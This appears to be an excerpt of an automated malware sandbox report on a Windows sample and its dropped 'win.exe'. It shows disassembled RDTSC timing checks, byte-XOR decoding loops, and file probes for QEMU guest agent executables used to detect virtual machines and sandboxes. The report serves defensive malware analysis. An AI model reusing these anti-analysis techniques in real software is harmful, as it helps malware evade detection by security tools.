            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B47A03 second address: 0000000002B47A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B459EB second address: 0000000002B459EB instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B4559F second address: 0000000002B4559F instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A8DD5 second address: 00000000020A8DD5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A5EBF second address: 00000000020A5EBF instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A7A03 second address: 00000000020A7A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A59EB second address: 00000000020A59EB instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A559F second address: 00000000020A559F instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000561732 second address: 0000000000561732 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [eax+ecx-01h], 0000005Eh 0x0000000f cmp cx, dx 0x00000012 xor byte ptr [eax+ecx-01h], 00000026h 0x00000017 xor byte ptr [eax+ecx-01h], 00000076h 0x0000001c cmp bl, 0000005Bh 0x0000001f add byte ptr [eax+ecx-01h], FFFFFFF2h 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F8D48A281D7h 0x0000002a pushad 0x0000002b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000561732 second address: 0000000000561732 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [eax+ecx-01h], 0000005Eh 0x0000000f cmp cx, dx 0x00000012 xor byte ptr [eax+ecx-01h], 00000026h 0x00000017 xor byte ptr [eax+ecx-01h], 00000076h 0x0000001c cmp bl, 0000005Bh 0x0000001f add byte ptr [eax+ecx-01h], FFFFFFF2h 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F8D488E6007h 0x0000002a pushad 0x0000002b rdtsc
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\AppData\Roaming\win.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350519839.0000000000910000.00000004.00000001.sdmp, win.exe, 00000014.00000002.756717088.0000000000740000.00000004.00000001.sdmp, win.exe, 00000015.00000002.544294519.00000000007B0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.581689179.0000000002270000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.287924663.00000000020B0000.00000004.00000001.sdmp, win.exe, 0000000F.00000002.482804268.0000000002200000.00000004.00000001.sdmp, win.exe, 00000010.00000002.540786741.0000000002B50000.00000004.00000001.sdmp, win.exe, 00000011.00000002.481669950.00000000020B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.287924663.00000000020B0000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350519839.0000000000910000.00000004.00000001.sdmp, win.exe, 0000000F.00000002.482804268.0000000002200000.00000004.00000001.sdmp, win.exe, 00000010.00000002.540786741.0000000002B50000.00000004.00000001.sdmp, win.exe, 00000011.00000002.481669950.00000000020B0000.00000004.00000001.sdmp, win.exe, 00000014.00000002.756717088.0000000000740000.00000004.00000001.sdmp, win.exe, 00000015.00000002.544294519.00000000007B0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.581689179.0000000002270000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A0153 second address: 00000000020A0297 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F8D488E6046h 0x00000005 test dl, bl 0x00000007 mov dword ptr [ebp-29h], edi 0x0000000a mov edi, 0B6FB570h 0x0000000f sub edi, 3B5E49F8h 0x00000015 xor edi, 6B2CFFD1h 0x0000001b sub edi, BB3D91A9h 0x00000021 sub esp, edi 0x00000023 mov edi, dword ptr [ebp-29h] 0x00000026 jmp 00007F8D488E6042h 0x00000028 test cl, cl 0x0000002a jmp 00007F8D488E6042h 0x0000002c cld 0x0000002d jmp 00007F8D488E6042h 0x0000002f cmp edx, ebx 0x00000031 jmp 00007F8D488E6046h 0x00000033 test dl, bl 0x00000035 jmp 00007F8D488E6046h 0x00000037 test ch, bh 0x00000039 jmp 00007F8D488E6042h 0x0000003b cmp edx, edx 0x0000003d push ebp 0x0000003e jmp 00007F8D488E6046h 0x00000040 test ah, bh 0x00000042 jmp 00007F8D488E6042h 0x00000044 jmp 00007F8D488E6050h 0x00000046 mov ebp, esp 0x00000048 jmp 00007F8D488E6046h 0x0000004a cmp cl, cl 0x0000004c mov dword ptr [ebp+0000013Ch], 00000000h 0x00000056 jmp 00007F8D488E6046h 0x00000058 pushad 0x00000059 mov eax, 000000AEh 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A5F52 second address: 00000000020A6004 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pushad 0x0000000c cmp dl, 0000005Fh 0x0000000f cmp dword ptr [ebp+0000013Ch], 00000000h 0x00000016 jne 00007F8D48A2841Bh 0x0000001c jmp 00007F8D48A28216h 0x0000001e test eax, eax 0x00000020 mov eax, 86EE1AF5h 0x00000025 test bl, bl 0x00000027 xor eax, BD4846E4h 0x0000002c xor eax, 21283749h 0x00000031 xor eax, 1A8E6E61h 0x00000036 cmp dx, cx 0x00000039 mov dword ptr [ebp+00000182h], edx 0x0000003f mov edx, 115ADCC7h 0x00000044 cmp edx, edx 0x00000046 test ebx, ecx 0x00000048 sub edx, D410C907h 0x0000004e xor edx, A788CB95h 0x00000054 jmp 00007F8D48A28216h 0x00000056 test cl, FFFFFF97h 0x00000059 xor edx, 9AC2D839h 0x0000005f push edx 0x00000060 cmp cl, bl 0x00000062 mov edx, dword ptr [ebp+00000182h] 0x00000068 mov dword ptr [ebp+00000177h], edi 0x0000006e mov edi, 5BE1273Ch 0x00000073 xor edi, 5A5059E2h 0x00000079 test cl, cl 0x0000007b xor edi, 6B9E11F2h 0x00000081 cmp ecx, eax 0x00000083 xor edi, 064B1B42h 0x00000089 pushad 0x0000008a rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A6004 second address: 00000000020A6004 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A8DD5 second address: 00000000020A8DD5 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A5EBF second address: 00000000020A5EBF instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A7A03 second address: 00000000020A7A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A59EB second address: 00000000020A59EB instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 00000000020A559F second address: 00000000020A559F instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 0000000000560153 second address: 0000000000560297 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F8D488E6046h 0x00000005 test dl, bl 0x00000007 mov dword ptr [ebp-29h], edi 0x0000000a mov edi, 0B6FB570h 0x0000000f sub edi, 3B5E49F8h 0x00000015 xor edi, 6B2CFFD1h 0x0000001b sub edi, BB3D91A9h 0x00000021 sub esp, edi 0x00000023 mov edi, dword ptr [ebp-29h] 0x00000026 jmp 00007F8D488E6042h 0x00000028 test cl, cl 0x0000002a jmp 00007F8D488E6042h 0x0000002c cld 0x0000002d jmp 00007F8D488E6042h 0x0000002f cmp edx, ebx 0x00000031 jmp 00007F8D488E6046h 0x00000033 test dl, bl 0x00000035 jmp 00007F8D488E6046h 0x00000037 test ch, bh 0x00000039 jmp 00007F8D488E6042h 0x0000003b cmp edx, edx 0x0000003d push ebp 0x0000003e jmp 00007F8D488E6046h 0x00000040 test ah, bh 0x00000042 jmp 00007F8D488E6042h 0x00000044 jmp 00007F8D488E6050h 0x00000046 mov ebp, esp 0x00000048 jmp 00007F8D488E6046h 0x0000004a cmp cl, cl 0x0000004c mov dword ptr [ebp+0000013Ch], 00000000h 0x00000056 jmp 00007F8D488E6046h 0x00000058 pushad 0x00000059 mov eax, 000000AEh 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRDTSC instruction interceptor: First address: 0000000000561732 second address: 0000000000561732 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [eax+ecx-01h], 0000005Eh 0x0000000f cmp cx, dx 0x00000012 xor byte ptr [eax+ecx-01h], 00000026h 0x00000017 xor byte ptr [eax+ecx-01h], 00000076h 0x0000001c cmp bl, 0000005Bh 0x0000001f add byte ptr [eax+ecx-01h], FFFFFFF2h 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F8D48A281D7h 0x0000002a pushad 0x0000002b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F0153 second address: 00000000021F0297 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F8D488E6046h 0x00000005 test dl, bl 0x00000007 mov dword ptr [ebp-29h], edi 0x0000000a mov edi, 0B6FB570h 0x0000000f sub edi, 3B5E49F8h 0x00000015 xor edi, 6B2CFFD1h 0x0000001b sub edi, BB3D91A9h 0x00000021 sub esp, edi 0x00000023 mov edi, dword ptr [ebp-29h] 0x00000026 jmp 00007F8D488E6042h 0x00000028 test cl, cl 0x0000002a jmp 00007F8D488E6042h 0x0000002c cld 0x0000002d jmp 00007F8D488E6042h 0x0000002f cmp edx, ebx 0x00000031 jmp 00007F8D488E6046h 0x00000033 test dl, bl 0x00000035 jmp 00007F8D488E6046h 0x00000037 test ch, bh 0x00000039 jmp 00007F8D488E6042h 0x0000003b cmp edx, edx 0x0000003d push ebp 0x0000003e jmp 00007F8D488E6046h 0x00000040 test ah, bh 0x00000042 jmp 00007F8D488E6042h 0x00000044 jmp 00007F8D488E6050h 0x00000046 mov ebp, esp 0x00000048 jmp 00007F8D488E6046h 0x0000004a cmp cl, cl 0x0000004c mov dword ptr [ebp+0000013Ch], 00000000h 0x00000056 jmp 00007F8D488E6046h 0x00000058 pushad 0x00000059 mov eax, 000000AEh 0x0000005e rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F5F52 second address: 00000000021F6004 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pushad 0x0000000c cmp dl, 0000005Fh 0x0000000f cmp dword ptr [ebp+0000013Ch], 00000000h 0x00000016 jne 00007F8D48A2841Bh 0x0000001c jmp 00007F8D48A28216h 0x0000001e test eax, eax 0x00000020 mov eax, 86EE1AF5h 0x00000025 test bl, bl 0x00000027 xor eax, BD4846E4h 0x0000002c xor eax, 21283749h 0x00000031 xor eax, 1A8E6E61h 0x00000036 cmp dx, cx 0x00000039 mov dword ptr [ebp+00000182h], edx 0x0000003f mov edx, 115ADCC7h 0x00000044 cmp edx, edx 0x00000046 test ebx, ecx 0x00000048 sub edx, D410C907h 0x0000004e xor edx, A788CB95h 0x00000054 jmp 00007F8D48A28216h 0x00000056 test cl, FFFFFF97h 0x00000059 xor edx, 9AC2D839h 0x0000005f push edx 0x00000060 cmp cl, bl 0x00000062 mov edx, dword ptr [ebp+00000182h] 0x00000068 mov dword ptr [ebp+00000177h], edi 0x0000006e mov edi, 5BE1273Ch 0x00000073 xor edi, 5A5059E2h 0x00000079 test cl, cl 0x0000007b xor edi, 6B9E11F2h 0x00000081 cmp ecx, eax 0x00000083 xor edi, 064B1B42h 0x00000089 pushad 0x0000008a rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F6004 second address: 00000000021F6004 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B40153 second address: 0000000002B40297 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F8D48A28216h 0x00000005 test dl, bl 0x00000007 mov dword ptr [ebp-29h], edi 0x0000000a mov edi, 0B6FB570h 0x0000000f sub edi, 3B5E49F8h 0x00000015 xor edi, 6B2CFFD1h 0x0000001b sub edi, BB3D91A9h 0x00000021 sub esp, edi 0x00000023 mov edi, dword ptr [ebp-29h] 0x00000026 jmp 00007F8D48A28212h 0x00000028 test cl, cl 0x0000002a jmp 00007F8D48A28212h 0x0000002c cld 0x0000002d jmp 00007F8D48A28212h 0x0000002f cmp edx, ebx 0x00000031 jmp 00007F8D48A28216h 0x00000033 test dl, bl 0x00000035 jmp 00007F8D48A28216h 0x00000037 test ch, bh 0x00000039 jmp 00007F8D48A28212h 0x0000003b cmp edx, edx 0x0000003d push ebp 0x0000003e jmp 00007F8D48A28216h 0x00000040 test ah, bh 0x00000042 jmp 00007F8D48A28212h 0x00000044 jmp 00007F8D48A28220h 0x00000046 mov ebp, esp 0x00000048 jmp 00007F8D48A28216h 0x0000004a cmp cl, cl 0x0000004c mov dword ptr [ebp+0000013Ch], 00000000h 0x00000056 jmp 00007F8D48A28216h 0x00000058 pushad 0x00000059 mov eax, 000000AEh 0x0000005e rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B45F52 second address: 0000000002B46004 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pushad 0x0000000c cmp dl, 0000005Fh 0x0000000f cmp dword ptr [ebp+0000013Ch], 00000000h 0x00000016 jne 00007F8D488E624Bh 0x0000001c jmp 00007F8D488E6046h 0x0000001e test eax, eax 0x00000020 mov eax, 86EE1AF5h 0x00000025 test bl, bl 0x00000027 xor eax, BD4846E4h 0x0000002c xor eax, 21283749h 0x00000031 xor eax, 1A8E6E61h 0x00000036 cmp dx, cx 0x00000039 mov dword ptr [ebp+00000182h], edx 0x0000003f mov edx, 115ADCC7h 0x00000044 cmp edx, edx 0x00000046 test ebx, ecx 0x00000048 sub edx, D410C907h 0x0000004e xor edx, A788CB95h 0x00000054 jmp 00007F8D488E6046h 0x00000056 test cl, FFFFFF97h 0x00000059 xor edx, 9AC2D839h 0x0000005f push edx 0x00000060 cmp cl, bl 0x00000062 mov edx, dword ptr [ebp+00000182h] 0x00000068 mov dword ptr [ebp+00000177h], edi 0x0000006e mov edi, 5BE1273Ch 0x00000073 xor edi, 5A5059E2h 0x00000079 test cl, cl 0x0000007b xor edi, 6B9E11F2h 0x00000081 cmp ecx, eax 0x00000083 xor edi, 064B1B42h 0x00000089 pushad 0x0000008a rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B46004 second address: 0000000002B46004 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A0153 second address: 00000000020A0297 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F8D488E6046h 0x00000005 test dl, bl 0x00000007 mov dword ptr [ebp-29h], edi 0x0000000a mov edi, 0B6FB570h 0x0000000f sub edi, 3B5E49F8h 0x00000015 xor edi, 6B2CFFD1h 0x0000001b sub edi, BB3D91A9h 0x00000021 sub esp, edi 0x00000023 mov edi, dword ptr [ebp-29h] 0x00000026 jmp 00007F8D488E6042h 0x00000028 test cl, cl 0x0000002a jmp 00007F8D488E6042h 0x0000002c cld 0x0000002d jmp 00007F8D488E6042h 0x0000002f cmp edx, ebx 0x00000031 jmp 00007F8D488E6046h 0x00000033 test dl, bl 0x00000035 jmp 00007F8D488E6046h 0x00000037 test ch, bh 0x00000039 jmp 00007F8D488E6042h 0x0000003b cmp edx, edx 0x0000003d push ebp 0x0000003e jmp 00007F8D488E6046h 0x00000040 test ah, bh 0x00000042 jmp 00007F8D488E6042h 0x00000044 jmp 00007F8D488E6050h 0x00000046 mov ebp, esp 0x00000048 jmp 00007F8D488E6046h 0x0000004a cmp cl, cl 0x0000004c mov dword ptr [ebp+0000013Ch], 00000000h 0x00000056 jmp 00007F8D488E6046h 0x00000058 pushad 0x00000059 mov eax, 000000AEh 0x0000005e rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A5F52 second address: 00000000020A6004 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pushad 0x0000000c cmp dl, 0000005Fh 0x0000000f cmp dword ptr [ebp+0000013Ch], 00000000h 0x00000016 jne 00007F8D48A2841Bh 0x0000001c jmp 00007F8D48A28216h 0x0000001e test eax, eax 0x00000020 mov eax, 86EE1AF5h 0x00000025 test bl, bl 0x00000027 xor eax, BD4846E4h 0x0000002c xor eax, 21283749h 0x00000031 xor eax, 1A8E6E61h 0x00000036 cmp dx, cx 0x00000039 mov dword ptr [ebp+00000182h], edx 0x0000003f mov edx, 115ADCC7h 0x00000044 cmp edx, edx 0x00000046 test ebx, ecx 0x00000048 sub edx, D410C907h 0x0000004e xor edx, A788CB95h 0x00000054 jmp 00007F8D48A28216h 0x00000056 test cl, FFFFFF97h 0x00000059 xor edx, 9AC2D839h 0x0000005f push edx 0x00000060 cmp cl, bl 0x00000062 mov edx, dword ptr [ebp+00000182h] 0x00000068 mov dword ptr [ebp+00000177h], edi 0x0000006e mov edi, 5BE1273Ch 0x00000073 xor edi, 5A5059E2h 0x00000079 test cl, cl 0x0000007b xor edi, 6B9E11F2h 0x00000081 cmp ecx, eax 0x00000083 xor edi, 064B1B42h 0x00000089 pushad 0x0000008a rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A6004 second address: 00000000020A6004 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F8DD5 second address: 00000000021F8DD5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F5EBF second address: 00000000021F5EBF instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F7A03 second address: 00000000021F7A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F59EB second address: 00000000021F59EB instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000021F559F second address: 00000000021F559F instructions:
